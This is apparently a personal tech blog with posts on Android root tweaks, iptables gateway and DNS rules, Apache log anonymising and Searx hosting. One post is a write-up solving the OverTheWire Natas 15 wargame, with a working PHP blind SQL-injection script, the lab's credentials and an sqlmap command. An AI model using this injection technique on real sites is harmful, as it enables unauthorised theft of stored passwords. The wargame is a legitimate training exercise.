Daniels Blog
26Mrz/170

Android – Increase headphones volume in Android 7 Nougat / Lineage OS

Time for bleeding ears:

- Mount /etc read/writeable with your favourite file explorer (Root Explorer can do it for example)
- Locate /etc/mixer_paths.xml
- Open it with your favourite text editor.
- Play with the values for "RX1 Digital Volume" and "RX2 Digital Volume" in the "Headphones" path
- Save
- Reboot
- Check the results

Be careful, it can get very loud and noisy if you push it too far. I guess it might even damage your headphones/ears, so start your tests with a low volume. I set mine to 93 on my bullhead device (Nexus 5x) and it's too loud for some of my MP3 at max volume, still great for most of my others.

veröffentlicht unter: Android keine Kommentare
13Dez/160

Overthewire Wargame – Natas 15 [spoiler]

This is my solution for Natas 15 (http://overthewire.org/wargames/natas/natas15.html).
This has been my first time trying to do a blind SQL-injection so it took some time and reading to
finaly succeed. This very nice writeup tought me the technique i am using in my code: (http://sqlinjections.blogspot.de/2009/04/sql-injection-tutorial-by-marezzi-mysql.html)

Natas 15 was real fun. I learned a lot and I couldn't believe that I finaly made it work (after 6 hours or so) 😉

#!/usr/bin/php

function send_req($inject)
{
    
    $u = "natas15";
    $p = "AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J";
 
    $inject = urlencode($inject);

    $url = "http://$u:$p@natas15.natas.labs.overthewire.org/?username=$inject&debug=1";
    
    $data = file($url);
    
    $data = $data[13];
    if (str_replace("doesn't","",$data)!=$data)
    $success = 0;
    else
    $success = 1;
    
    return($success);  
}

function probe_offset($offset)
{
    $char = 47;

    while ($char < 130) { $inj = 'natas16" and ascii(substring((SELECT password from users where username="natas16"),' . $offset . ',1))>' . $char . '-- -';
    $res = send_req($inj);

    echo ".";
    if ($res == 0)
    {
    return(chr($char));
    } 
    $char ++;
    }

}

$pass = "";
$offset = 1;
while ($offset < 33)
{
$good = probe_offset($offset);
echo $good;
$offset++;
$pass .= $good;
}

echo "\n\n Here we go :) $pass  \n\n";




If you are lazy, you could have used sqlmap:

sqlmap -u natas15.natas.labs.overthewire.org/index.php?username=natas16 --auth-cred=natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J --auth-type=Basic --dbms=mysql --string=exists --level=3  --batch --current-db -T users -D natas15 -a
veröffentlicht unter: Linux keine Kommentare
28Nov/162

Shell commands for hardware management in Android 6 Marshmallow / Cyanogenmod 13

android-shellIf you are using an automation app like Tasker, Llama or Automate, you can toggle / turn on / turn off WIFI, Data, GPS etc. with shell commands. I collected these little sniplets for my own setup. They work on my device (Nexus 5x with Cyanogenmod 13). They should work on other Android 6 devices as well.

Run all shell commands as root.

WIFI

svc wifi enable
svc wifi disable

DATA

svc data enable
svc data disable

GPS

# turn GPS on
settings put secure location_providers_allowed +gps 
# turn GPS off
settings put secure location_providers_allowed -gps 

Flightmode

# Flightmode on
settings put global airplane_mode_on 1
am broadcast -a android.intent.action.AIRPLANE_MODE

# Flightmode off
settings put global airplane_mode_on 0
am broadcast -a android.intent.action.AIRPLANE_MODE

Turn off screen without locking device (emulate power button keypress)

input keyevent 26

Toggle Network mode (2G/3G/4G)
I have been searching for a long time, but there seems to be no direct way to do this.
The best solution I have found requires xposed framework and gravitybox installed.

I found the available network types here:
http://android.stackexchange.com/questions/44347/simple-way-to-toggle-between-2g-and-3g-connection

Identify the right settings for your device:

# Disable your automation app, set networking mode with the preferences in your devices GUI.
# Then run

settings get global preferred_network_mode 

# The currently set network mode number will be shown in shell

Just send the following intent to toggle network mode:

Send Intent [
Action: gravitybox.intent.action.CHANGE_NETWORK_TYPE
Cat: None
Mime Type:
Data:
Extra: networkType:1
Extra:
Package:
Class:
Target: Broadcast Receiver]

networkType enum values are: 
0: WCDMA Preferred 
1: GSM only <-- This would be "2G" on GSM networks
2: WCDMA only <--WCDMA is "3G" on GSM networks. You may know it as HSPA
3: GSM auto (PRL)
4: CDMA auto (PRL)
5: CDMA only <-- This would be "2G" on CDMA networks
6: EvDo only <-- EvDo is "3G" on CDMA networks
7: GSM/CDMA auto (PRL)
8: LTE/CDMA auto (PRL)
9: LTE/GSM auto (PRL)
10: LTE/GSM/CDMA auto (PRL)
11: LTE only
12: "unknown"

Disable captive portal detection
This needs to be set at boottime. It doesn't survive a reboot.

settings put global captive_portal_detection_enabled 0
settings put global captive_portal_server 127.0.0.1

Force a DNS of your choice
Google removed the option to change the DNS for mobile data. (ugly, ugly, ugly)
You can force your device to use your fav DNS with iptables for mobile data:

/system/bin/iptables -t nat -A OUTPUT ! -o wlan0 -p udp --dport 53 -j DNAT --to-destination 213.73.91.35:53

In case you have found a better way to switch network mode, I'd really appreciate your comment 🙂

24Nov/160

Simulating a bad connection / packet loss with iptables

This will randomly drop 60% of outgoing packages with a local process as source.
Use it for testing purposes or if you need a good laugh.

#!/bin/bash
iptables -A OUTPUT -m statistic --mode random --probability 0.6 -j DROP
veröffentlicht unter: Linux keine Kommentare
24Nov/160

Iptables revised

640px-hilofilter-agr

Just a backup of the updated iptables setup for my gateway box:

[CABLE MODEM] - [eth0 GATEWAY eth1] - [LAN SWITCH] - - - [CLIENTS]

Thanks to O'Reilly for this great book that helped me a lot: Linux iptables Pocket Reference

#!/bin/bash                                                                                                                                                   
                                                                                                                                                        
wan_nic=eth0                                                                                                                                
lan_nic=eth1                                                                                                                                 
lan_nic_ip=192.168.1.69                                                                                                                     
lan_network=192.168.1.0/24                                                                                                                                                                                                                                                                                    
# PORT MAPPING FUNCTION
MAP(){
iptables -A PREROUTING -t nat -i $wan_nic -p $1 --dport $2 -j DNAT --to $3:$4
echo "PORTMAP: Mapped a port. localhost:$2 ($1) -> $3:$4 [$5]"
}


# Del old rules
iptables -t filter -F
iptables -t nat -F
iptables -t mangle -F 
echo "Deleted old rules"

# Default Policies
#iptables -P PREROUTING ACCEPT
iptables -P FORWARD ACCEPT
iptables -P INPUT DROP
iptables -P OUTPUT ACCEPT
#iptables -P POSTROUTING ACCEPT
echo "Set default policies"

# Enable NAT
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "Enabled ip_forward in kernel"

###### INPUT LOCAL

# FROM EVERYWHERE
iptables -A INPUT -p icmp -j ACCEPT

# FROM LOCAL TO LOCAL
iptables -A INPUT -i lo -j ACCEPT

# FROM LAN TO LOCAL

# Needed for DHCP clients (no ip yet so allow interface, not ip range)
iptables -A INPUT -i $lan_nic -j ACCEPT

# Allow LAN TO LOCAL
iptables -A INPUT -s $lan_network -j ACCEPT

# ALLOW PACKAGES SENT FROM GW TO WAN TO COME BACK
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

# FROM WAN TO LOCAL
iptables -A INPUT ! -s $lan_network -j DROP

echo "Configured INPUT CHAIN"

###### OUTPUT LOCAL (done with default policy)
# FROM LOCAL TO LAN
# FROM LOCAL TO WAN
# FROM LOCAL TO LOCAL

###### FORWARD
# FORWARD FROM LAN TO WAN


# LOCK BAD CLIENTS IN LAN
#SONY TV
iptables -A FORWARD -s 192.168.1.20 -j DROP
#NETGEAR
iptables -A FORWARD -s 192.168.1.100 -j DROP
#DLINK
iptables -A FORWARD -s 192.168.1.101 -j DROP

echo "Configured FORWARD chain"


# FORWARD FROM WAN TO LAN

# NAT the LAN
/sbin/iptables -t nat -A POSTROUTING -o $wan_nic -j MASQUERADE

echo "Enabled MASQUERADEing"

# Don't forward unrelated packages from the outside
iptables -A FORWARD -i $wan_nic -m state --state INVALID -j DROP 

echo "DISABLED FORWARDING for connections from the outside"

# Portmappings from WAN to LAN
MAP tcp 80    192.168.1.2 80  SRV_HTTP




# FINALIZE

/etc/init.d/networking restart
echo
echo
dhclient -v eth0
echo 
echo
ping -c1 134.99.128.2
echo
echo
ping -c1 192.168.1.2

echo
echo 
echo "done"

veröffentlicht unter: Linux keine Kommentare
17Nov/160

Disabling Captive Portal in Android Cyanogenmod 13+ Marshmallow

If you have seen that stupid ! beside your WIFI or MobileData icons in Android, you have discovered the "Captive Portal Detection" which has been added in KitKat or so. It's terribly bugged if you are using a firewall in Android plus if you don't, your device connects to Google every time you go online.

Since Marshmallow this behaviour can't be disabled permanently. Captive Portal Detection is being reenabled after every boot.
So use your favourite script runner app (Tasker can do it) to run these commands at boot time to disable the crap:

settings put global captive_portal_detection_enabled 0
settings put global captive_portal_server localhost
veröffentlicht unter: Android keine Kommentare
17Nov/160

Changing DNS for mobile data in Cyanogenmod 12+ and Android Kitkat Marshmallow

You need root for this.

In my (probably never ending) mission to remove Google from my Android device, I recently found out, that I missed a very important detail. When using mobile data, the phone gets its IP and DNS information from the cell provider. With recent android versions, the cell providers DNS is sometimes being ignored and Googles DNS server (8.8.8.8) is used instead. This allows Google to mine data on every DNS request done by many Android devices in the world. The DNS setting for mobile data can't be changed in the GUI. There are older shell commands which used to work in KitKat to change the mobile data DNS on Android but they are being silently ignored. If 8.8.8.8 is not set, your cell providers DNS is used which most probably also mines your resolved domains. If you are into privacy, it's always a good idea to use a trustworthy DNS for your connection. It's kinda creepy, that there is no uncomplicated way to change the mobile data DNS in Android.

But there is a hackish solution that works.
You need AFWall for it. As you reached this article I asume, that you are already using it. It's an iptables fireall implementation for Android that allows you to block internet access for certain apps and run custom iptable commands automatically.

- Open Afwall
- Menu
- Set custom script

You can set 2 custom scripts here. One runs after the firewall is being enabled, the other one runs after the firewall is being stopped.

# Enable script
# Route all outgoing traffic with a destination port of 53 (DNS) to another DNS server

IT=/system/bin/iptables
DNS=your.fav.dns.ip
$IT -t nat -A OUTPUT -p tcp --dport 53 -j DNAT --to-destination $DNS:53
$IT -t nat -A OUTPUT -p udp --dport 53 -j DNAT --to-destination $DNS:53
# Disable script
# Remove the 2 rules from the NAT table

IT=/system/bin/iptables
$IT -t nat -D OUTPUT 1
$IT -t nat -D OUTPUT 1

You can check your used DNS server(s) here: https://www.perfect-privacy.com/german/dns-leaktest/

A few more trustworthy DNS servers can be found here (scroll down): https://www.ccc.de/censorship/dns-howto/

Shame on you Google. I have to tinker with iptables to set such a basic thing as a DNS server?
Ugly. Ugly. Ugly.

UPDATE:
The Afwall method didn't work well on my device after some testing. Sometimes I was unable to use DNS at all. Running the iptables rule from any startup script during boot works fine though (Tasker can do it). I changed the script a bit to only affect mobile data DNS because changing it for Wifi as well (in the original script) broke other things in my LAN.

# Enable script
# Route all outgoing traffic going thru rmnet interfaces (androids mobile data interfaces) with a destination port of 53 (DNS) to another DNS server

IT=/system/bin/iptables
DNS=your.fav.dns.ip
$IT -t nat -A OUTPUT -i rmnet+ -p tcp --dport 53 -j DNAT --to-destination $DNS:53
$IT -t nat -A OUTPUT -i rmnet+ -p udp --dport 53 -j DNAT --to-destination $DNS:53
veröffentlicht unter: Android keine Kommentare
8Nov/160

Ich hoste eine eigene Searx Instanz

Searx ist eine Meta-Suchmaschine, die man relativ einfach auf dem eigenen Server hosten kann. Searx versucht so gut wie möglich die PrivatsphĂ€re der User zu schĂŒtzen und ein anonymes aber doch bequemes Suchen zu ermöglichen. Die Nutzung von Searx bietet viele Vorteile:

  • Paralleles Abfragen von ca. 70 Suchmaschinen
  • Stark konfigurierbar
  • Nettes Design
  • Man hinterlĂ€sst seine IP-Adresse nicht auf den Servern der Suchmaschinen und kann so weitestgehend anonym suchen. Die abgefragten Suchmaschinen erhalten lediglich die Adresse des Searx-Servers. Nutzt man einen Server, den viele andere auch nutzen, ist von der Suchmaschine nicht mehr nachvollziehbar, wer gerade was gesucht hat.
  • Man bekommt keine Cookies von den Suchmaschinen untergejubelt

Meine Installation bietet die folgenden Features:

  • Relativ flott, mit schneller Leitung an mehrere Backbones angebunden
  • Searx nutzt 6 CPU-Cores parallel
  • Searx selbst loggt nicht
  • Mein Webserver loggt nicht die Inhalte der Requests und nur das erste Oktett der IP-Adresse. Eine Zuordnung zu einer bestimmten Person ist so nicht mehr möglich.

Meine Searx-Instanz findet Ihr hier: https://www.perfectpixel.de/searx/
Viele weitere Searx-Instanzen findet Ihr hier: https://github.com/asciimoo/searx/wiki/Searx-instances

veröffentlicht unter: Dies und das keine Kommentare
8Nov/160

IP-Adressen in Apache Logfiles anonymisieren mit PipedLogs

Ich hatte gestern eine Aufgabe, fĂŒr die ich zunĂ€chst keine einfache Lösung gesehen habe: Ich wollte in den Apache-Logfiles die IP-Adressen anonymisieren. Also aus den geloggten IP-Adressen Teile entfernen um noch ein rudimentĂ€res Logging der einzelnen Besucher zu haben, aber nicht mehr ihre kompletten IPs mitzuschreiben.

So sollte aus einer 212.122.113.145 eine ***.***.*13.145 werden.
Dies sollte - um möglichst grosse Sicherheit zu garantieren - nicht nachtrÀglich geschehen, sondern live im Logvorgang des Apache.
Es sollten also niemals die kompletten IPs auf der Platte landen

Nach etwas Recherche bin ich auf eine mir bis dahin unbekannte Apache-FunktionalitÀt gestossen: PipedLogs.

PipedLogs ermöglichen es in der Apachekonfiguration fĂŒr einen VirtualHost nicht einen Logfile anzugeben sondern ein Skript festzulegen, das bei jedem Logvorgang gestartet wird und als Standardeingabe die Logzeile vom Apache erhĂ€lt.

In der Config vom entsprechenden VirtualHost sieht das Ganze so aus:

LogFormat "%h %l %u %t \"%r\" %>s %b" common
CustomLog "|/root/scripts/anonymize_apache" common

Jeder Logentry wird somit durchgereicht an das Script /root/scripts/anonymize_apache

Der Rest ist nur noch eine Kleinigkeit mit der BASH:

#!/bin/bash

#/root/scripts/anonymize_apache

# Von Standardeingabe lesen
read logline

# Mit sed die gewĂŒnschten Teile der IP wegschnippseln
anon=$(echo $logline | sed -r 's/^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]/***.***.*/g'  )

# Das Ergebnis anonymisiert ins Logfile zurĂŒckschreiben 
echo $anon  >> /var/log/apache2/myvirtualhost.anon.log

Edit: Habe nach dem Verfassen des Artikels ein Skript gefunden, das mehr FunktionalitÀt bietet als mein Dreizeiler:
https://www.privacyfoundation.ch/de/service/anonip.html

veröffentlicht unter: Linux keine Kommentare
27Okt/160

Cleaning up Cyanogenmod 13 Nexus 5x (bullhead)

This is just the backup of my personal crap removal and tweak script for CM13

#!/system/bin/sh

echo "MOUNTING /system r/w"
mount -o rw,remount,rw /system

echo "KILLING CRAP from /system/app"

rm -rf /system/app/NfcNci
rm -rf /system/app/PrintSpooler
rm -rf /system/app/LockClock
rm -rf /system/app/RCSBootstraputil
rm -rf /system/app/RcsImsBootstraputil
rm -rf /system/app/Profiles

echo "KILLING CRAP from /system/priv-app"
rm -rf /system/priv-app/AudioFX
rm -rf /system/priv-app/CellBroadcastReceiver
rm -rf /system/priv-app/CMBugReport
rm -rf /system/priv-app/CNEService
rm -rf /system/priv-app/GCS
rm -rf /system/priv-app/HotwordEnrollment
rm -rf /system/priv-app/LifetimeService
rm -rf /system/priv-app/ManagedProvisioning
rm -rf /system/priv-app/ThemeChooser
rm -rf /system/priv-app/ThemesProvider
rm -rf /system/priv-app/CMBugReport
rm -rf /system/priv-app/OneTimeInitializer

echo "MUTING CAMERA ETC."
chmod ugo-rwx /system/media/audio/ui/camera_click.ogg
chmod ugo-rwx /system/media/audio/ui/camera_focus.ogg
chmod ugo-rwx /system/media/audio/ui/VideoRecord.ogg
chmod ugo-rwx /system/media/audio/ui/VideoStop.ogg
chmod ugo-rwx /system/media/audio/ui/Lock.ogg

echo "MOUNTING /system r/o"
mount -o ro,remount,ro /system

echo "FIXING Volume"
mount -o rw,remount,rw /
cp /sdcard/mixer_paths.xml /etc
mount -o ro,remount,ro /

echo "DONE"

veröffentlicht unter: Android keine Kommentare
21Mai/161

Increase headphones volume in CyanogenMod 13

Time for bleeding ears:

- Mount /etc read/writeable with your favourite file explorer (Root Explorer can do it for example)
- Locate /etc/mixer_paths.xml
- Open it with your favourite text editor.
- Play with the values for "RX1 Digital Volume" and "RX2 Digital Volume" in the "Headphones" path
- Save
- Reboot
- Check the results

Be careful, it can get very loud and noisy if you push it too far. I set mine to 94 on a serranoltex device (SAMSUNG S4 Mini INT) and it's too loud for some of my MP3 at max volume, still great for most of my others.

5Okt/150

LPIC 101 Lernvideos

Ich hatte schon seit ewigen Zeiten vor endlich mal LPIC2 zu machen. Die 201 habe ich bereits vor einigen Jahren bestanden und es bisher immer verklĂŒngelt die 202 zu machen. Irgendwie hat man ja in seiner Freizeit (fast) immer was besseres zu tun 😉 Trotztdem dachte ich mir, dass es doch noch ein schönes Ziel fĂŒr 2015 wĂ€re, das Ganze endlich hinter mich zu bringen.

So weit so gut. Ich habe mich also bei LPI eingeloggt um mich fĂŒr die 202 anzumelden und dabei mit Schrecken festgestellt, dass mein Level 1 vor 3 Monaten abgelaufen war. Meine Hoffnung war nun, dass ich die PrĂŒfung 202 trotzdem ablegen kann, da ich 201 bereits besitze aber dem war leider nicht so.

"Sie mĂŒssen zunĂ€chst fĂŒr Level 1 zertifiziert sein um Level 2 PrĂŒfungen abzulegen". Verdammt! Immerhin ist kein erneutes Ablegen der 201 notwendig. Trotzdem war ich natĂŒrlich alles andere als begeistert mich noch einmal durch die 1 zu quĂ€len.

Nach einigen Tagen des Haderns habe ich mich entschlossen noch einmal LPIC1 zu machen und das Ganze mit kommentierten Lernvideos zu begleiten. Deshalb heute nach meiner bestandenen 101-400 PrĂŒfung auch meine erste Videoserie auf YouTube. Vielleicht hilft es jemandem, der gerade auch fĂŒr die 101 lernt.

Meine LPIC 101 Videos gibt es hier: Lets Learn LPIC 101 deutsch - Youtube

veröffentlicht unter: Linux keine Kommentare